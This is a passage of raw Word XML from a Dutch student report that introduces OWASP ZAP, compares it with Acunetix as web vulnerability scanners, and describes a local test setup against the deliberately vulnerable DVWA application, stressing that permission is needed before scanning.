        <w:t xml:space="preserve">Het systeem wordt geanalyseerd en </w:t>
      </w:r>
      <w:r>
        <w:t>het ondergaat een security test van een eindgebruiker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F8AD95" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00412B29" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00412B29">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Code review   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727E04F" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r w:rsidRPr="00E67297">
        <w:t xml:space="preserve">De code van het systeem wordt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E67297">
        <w:t>gerevie</w:t>
      </w:r>
      <w:r>
        <w:t>wd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en het wordt specifiek geanalyseerd op security kwetsbaarheden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD4EC7F" w14:textId="6CE23A52" w:rsidR="00554FF4" w:rsidRDefault="00D90FF1" w:rsidP="00554FF4">
      <w:r>
        <w:t>ZAP-proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5681AE02" w14:textId="7B6DBF3E" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Het doel van het document is natuurlijk om een introductie te maken voor OWASP ZAP. Ik heb eerder al een aantal dingen verteld over de </w:t>
      </w:r>
      <w:r w:rsidR="00D90FF1">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, maar ik zal er wat verder op in gaan in dit deel. Fundamenteel is ZAP een interceptie proxy tool, het staat tussen de eindgebruiker en webbrowser. De </w:t>
      </w:r>
      <w:r w:rsidR="00D90FF1">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> onderschept berichten die gestuurd worden door de webbrowser naar de eindgebruiker in dit geval de tester. Na de onderschepping worden de berichten door ZAP geïnspecteerd en als nodig aangepast, dit staat ook wel bekent als de ‘man in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ aanval. Mocht er al een proxy in gebruik zal, vele bedrijven hebben dit, dan kan Zap verbinding maken met de gebruikte proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434BFD77" w14:textId="77777777" w:rsidR="006C1447" w:rsidRDefault="006C1447" w:rsidP="006C1447">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B009B0B" wp14:editId="52AB25D0">
            <wp:extent cx="5760720" cy="151447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p proxy.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514475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="326563D5" w14:textId="29BEFB32" w:rsidR="006C390F" w:rsidRDefault="006C1447" w:rsidP="006C1447">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.</w:t>
      </w:r>
      <w:r w:rsidR="000D4F4B">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293D12F" w14:textId="77777777" w:rsidR="006241E9" w:rsidRDefault="006241E9" w:rsidP="00554FF4"/>
    <w:p w14:paraId="674016C3" w14:textId="50BCB46C" w:rsidR="00554FF4" w:rsidRPr="00D36ED8" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D36ED8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ZAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D36ED8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56049D18" w14:textId="77777777" w:rsidR="003C5FA0" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">ZAP biedt voor alle grote besturingssysteem platformen een versie en is gemaakt voor zowel experts op gebied van cyber security en beginners. Zap biedt ook vele </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>add-ons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> voor de ZAP DAST tool, deze zijn te vinden op de </w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>ZAP-marktplaats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. ZAP wordt onderhouden door een grote gemeenschap die onderhoud verrichten en geregeld nieuwe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>add-ons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (toevoegingen van features) ontwikkelen en publiceren op de marktplaats. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCA72C" w14:textId="77777777" w:rsidR="003C5FA0" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">De ZAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> applicatie maakt gebruik van een User Interface waar de eindgebruiker de verschillende taken kan uitvoeren. Het design van de UI kwam mij bekent voor omdat het gebruik maakt van de Java Swing thema Nimbus. Dit betekent ook dat </w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>ZAP-proxy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ontwikkeld is in Java. De ZAP UI bestaat uit 6 onderdelen: menubalk, takenbalk, boomstructuur venster, werkruimte venster, informatie venster, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>footer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Voordat er een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">penetratie test) uitgevoerd kan worden zal de proxy als eerst geconfigureerd moeten worden. De UI van Zap maakt het configureren zeer gemakkelijk, zoals het invoeren van een nieuwe </w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>SSL-certificaat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of het instellen van een nieuwe proxy port. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B6EB62" w14:textId="77777777" w:rsidR="003C5FA0" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">De Zap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> biedt verschillende scan configuraties voor het testen van een webapplicatie. De meest opvallende is de Snelle start test, deze test optie krijgt de eindgebruiker te zien wanneer de applicatie is opgestart. Om hiervan gebruik te maken voert de eindgebruiker de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in de tekstbalk en druk vervolgens op ‘Aanval’ om de test te starten. Er is wel een disclaimer, om een website te testen heb je wel toestemming nodig. De ZAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zal, na het starten van de test, de website doorzoeken naar webpagina’s om deze vervolgens elke gevonden webpagina passief te scannen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B636F8" w14:textId="78220586" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Na het passief scannen zal de ZAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> overgaan naar het actief scannen van de webpagina’s. Het doel van een passieve scan is om het voorwerk te doen voor de actieve scan. De passieve scan leest en neemt alle verkeer op dat tussen de browser en website wordt gecommuniceerd. Dit betreft de GET/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en de responses ervan. Dit is de wijze waarop een webbrowser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> communiceert met de webserver, door </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F6E96">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(een verzoek voo</w:t>
      </w:r>
      <w:r w:rsidR="00D54124">
        <w:t xml:space="preserve">r een webpagina) en een response </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(antwoord op het verzoek). Na dit proces analyseert ZAP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de data en kijkt of er ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>known</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> issues’ (bekende problemen) gevonden zijn. Actief scannen is meer gericht op het aanvallen van de gevonden ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>known</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> issues’. Bij het actief scannen worden er echte aanvallen uitgevoerd, dat betekent dus dat het doelwit risico’s kan lopen. Dit is ook een reden waarom je eerst toestemming moet hebben voordat je een test mag uitvoeren. Voor meer informatie over de ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>known</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> issues’, deze worden in het hoofdstuk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00876EAD">
        <w:t>OWASP top</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00876EAD">
        <w:t xml:space="preserve"> tien lijst behandeld.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ACF7EA" w14:textId="77777777" w:rsidR="0014570A" w:rsidRDefault="0014570A" w:rsidP="00554FF4"/>
    <w:p w14:paraId="40CE2017" w14:textId="77777777" w:rsidR="00BA2E92" w:rsidRDefault="00BA2E92" w:rsidP="00554FF4"/>
    <w:p w14:paraId="5E724DA0" w14:textId="77777777" w:rsidR="001545B1" w:rsidRDefault="001545B1" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A9D875" w14:textId="6AC9B6B9" w:rsidR="00180F10" w:rsidRPr="0014570A" w:rsidRDefault="0014570A" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014570A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Test omgeving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096792CD" w14:textId="641C9EBB" w:rsidR="00554FF4" w:rsidRDefault="007042EB" w:rsidP="00554FF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="630C0A06" wp14:editId="7BAAB1B6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>802005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>564515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3289935" cy="2177415"/>
            <wp:effectExtent l="0" t="0" r="1206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omgeving.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3289935" cy="217741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9200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21B4A551" wp14:editId="1CCC673B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>735542</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2797175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3772535" cy="26670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772535" cy="266700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4DDC15F3" w14:textId="78DF71AB" w:rsidR="00CE4BB5" w:rsidRPr="00641B06" w:rsidRDefault="00CE4BB5" w:rsidP="007042EB">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 3.3.1 - testomgeving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4A551" id="Text Box 16" o:spid="_x0000_s1052" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:57.9pt;margin-top:220.25pt;width:297.05pt;height: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86MoDoCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF+cpGi6GXWKLEWGAUVb&#10;IB16VmQ5NiCLmqTE7n79nuQ43bqdhl1kiqT48R7p65u+1eyonG/IFHw2mXKmjKSyMfuCf3vafPjI&#10;mQ/ClEKTUQV/UZ7fLN+/u+5sruZUky6VYwhifN7Zgtch2DzLvKxVK/yErDIwVuRaEXB1+6x0okP0&#10;Vmfz6XSRdeRK60gq76G9HYx8meJXlZLhoaq8CkwXHLWFdLp07uKZLa9FvnfC1o08lSH+oYpWNAZJ&#10;z6FuRRDs4Jo/QrWNdOSpChNJbUZV1UiVekA3s+mbbra1sCr1AnC8PcPk/19YeX98dKwpwd2CMyNa&#10;cPSk+sA+U8+gAj6d9TncthaOoYcevqPeQxnb7ivXxi8aYrAD6ZczujGahPLi6mp+eXHJmYRtvlhc&#10;TRP82etr63z4oqhlUSi4A3sJVHG88wGVwHV0ick86abcNFrHSzSstWNHAaa7ugkq1ogXv3lpE30N&#10;xVeDedCoNCqnLLHhobEohX7XDwB9GrveUfkCMBwN4+St3DRIfyd8eBQO84P+sRPhAUelqSs4nSTO&#10;anI//qaP/qAVVs46zGPB/feDcIoz/dWA8Di8o+BGYTcK5tCuCY3PsG1WJhEPXNCjWDlqn7Eqq5gF&#10;JmEkchU8jOI6DFuBVZNqtUpOGFErwp3ZWhlDjzA/9c/C2RNJAfTe0zipIn/D1eCb2LKrQwDwicgI&#10;7IAiOIoXjHdi67SKcX9+vSev1x/G8icAAAD//wMAUEsDBBQABgAIAAAAIQA/MBLn4gAAAAsBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUhcELVbkv6EOFVVwYFeKtJeuLnxNg7EdhQ7&#10;bXh7lhMcZ2c0822+Hm3LLtiHxjsJ04kAhq7yunG1hOPh9XEJLETltGq9QwnfGGBd3N7kKtP+6t7x&#10;UsaaUYkLmZJgYuwyzkNl0Kow8R068s6+tyqS7Guue3WlctvymRBzblXjaMGoDrcGq69ysBL2ycfe&#10;PAznl90meerfjsN2/lmXUt7fjZtnYBHH+BeGX3xCh4KYTn5wOrCW9DQl9CghSUQKjBILsVoBO9Fl&#10;OUuBFzn//0PxAwAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAC/OjKA6AgAAeAQAAA4AAAAA&#10;AAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAD8wEufiAAAACwEAAA8A&#10;AAAAAAAAAAAAAAAAkgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAChBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4DDC15F3" w14:textId="78DF71AB" w:rsidR="00CE4BB5" w:rsidRPr="00641B06" w:rsidRDefault="00CE4BB5" w:rsidP="007042EB">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 3.3.1 - testomgeving</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00180F10">
        <w:t>Voor het uitvoeren van een scan heb ik een test omgeving opgezet.</w:t>
      </w:r>
      <w:r w:rsidR="009433B7">
        <w:t xml:space="preserve"> De test omgeving bestaat uit drie componenten: de browser, de </w:t>
      </w:r>
      <w:r w:rsidR="0078383D">
        <w:t>proxyserver</w:t>
      </w:r>
      <w:r w:rsidR="009433B7">
        <w:t xml:space="preserve"> en de webserver waar DVWA op draait.</w:t>
      </w:r>
      <w:r w:rsidR="00B41511">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003702D4">
        <w:t xml:space="preserve">De hele test omgeving </w:t>
      </w:r>
      <w:r w:rsidR="004C0298">
        <w:t xml:space="preserve">zit in een </w:t>
      </w:r>
      <w:r w:rsidR="00F17BF8">
        <w:t>lokaal</w:t>
      </w:r>
      <w:r w:rsidR="004C0298">
        <w:t xml:space="preserve"> netwerk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AFACE8" w14:textId="77777777" w:rsidR="007042EB" w:rsidRDefault="007042EB" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210616C3" w14:textId="77777777" w:rsidR="00E93607" w:rsidRDefault="00E93607" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6577799E" w14:textId="5773CE6B" w:rsidR="00554FF4" w:rsidRPr="00723BE8" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723BE8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wat is het resultaat na het scannen van de DVWA voor beide </w:t>
      </w:r>
      <w:r w:rsidR="00D90FF1" w:rsidRPr="00723BE8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DAST-tools</w:t>
      </w:r>
      <w:r w:rsidRPr="00723BE8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381969D" w14:textId="67854F49" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">In dit hoofdstuk ga ik kijken hoe de twee </w:t>
      </w:r>
      <w:r w:rsidR="00D90FF1">
        <w:t>DAST-tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DVWA website</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scannen en wat voor bevindingen zij maken na de scan. Het doel van dit hoofdstuk is om een aantal vragen te beantwoorden zodat ik meer inzicht krijg in de werking van een </w:t>
      </w:r>
      <w:r w:rsidR="00D90FF1">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vragen die ik graag beantwoord wil hebben zijn: “op wat wordt er gescand, hoe ziet de datastructuur eruit, wat voor data er </w:t>
      </w:r>
      <w:r w:rsidR="005C3750">
        <w:t>verzameld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D90FF1">
        <w:t>wordt?,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hoelang duurt een scan, hoe worden de rapporten gegenereerd”?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7BD450" w14:textId="3D77CE47" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Omdat ik </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> als eerst heb </w:t>
      </w:r>
      <w:r w:rsidR="005C3750">
        <w:t>behandeld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in dit document zal ik daarmee beginnen. De </w:t>
      </w:r>
      <w:r w:rsidR="005C3750">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> biedt een webapplicatie aan. Voor gebruik van deze webapplicatie heb ik als eerst een account moeten aanmaken, ook heb ik gemerkt dat het gaat om een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> versie. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is in tegenstelling van OWASP ZAP geen open-source </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>software applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, maar dat betekent niet dat OWASP ZAP minder goed presteert als security scanner. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CBB48" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00E67297" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Wat is DVWA, het doelwit van deze tests?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF9982A" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">DVWA staat voor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Damn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Web Application. De naam zegt het al, deze website is special gemaakt voor pen-testen en is daarvoor zeer kwetsbaar voor ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>known</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> issues’ aanvallen zoals injecties en Cross site scripting. Het is een PHP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> webapplicatie dat als doel heeft een hulpmiddel te zijn voor security professionals om hun skills te testen in een veilig en legale test omgeving. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414F6963" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>Om te beginnen…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8AC48C" w14:textId="0D9F0897" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Bij het starten van DVWA verschijnt er in de browser een login pagina waar de gebruiker zijn gebruikersnaam en wachtwoord moet intypen om gebruik te kunnen maken van de </w:t>
      </w:r>
      <w:r w:rsidR="005C3750">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Gelukkig is dit een lokale installatie en kan ik in mijn lokale database spieken om zo aan de twee accountgegevens te komen. De login scherm is voor een </w:t>
      </w:r>
      <w:r w:rsidR="005C3750">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> een hindernis, wanneer er geen inloggegevens zijn meegegeven bij een scan dan kan de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DAST tool</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> niet verder scannen dan de login pagina. Dit resulteert dan in een incomplete scan een website (het doelwit) en geeft vrij weinig informatie over de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>security toestand</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van het doelwit. Zowel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en ZAP bieden de mogelijkheid om voor de scan inloggegevens mee te geven waarmee zij tijdens de confrontatie met </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">het inlogscherm </w:t>
      </w:r>
      <w:r w:rsidR="005C3750">
        <w:t>probleemloos</w:t>
      </w:r>
      <w:r>
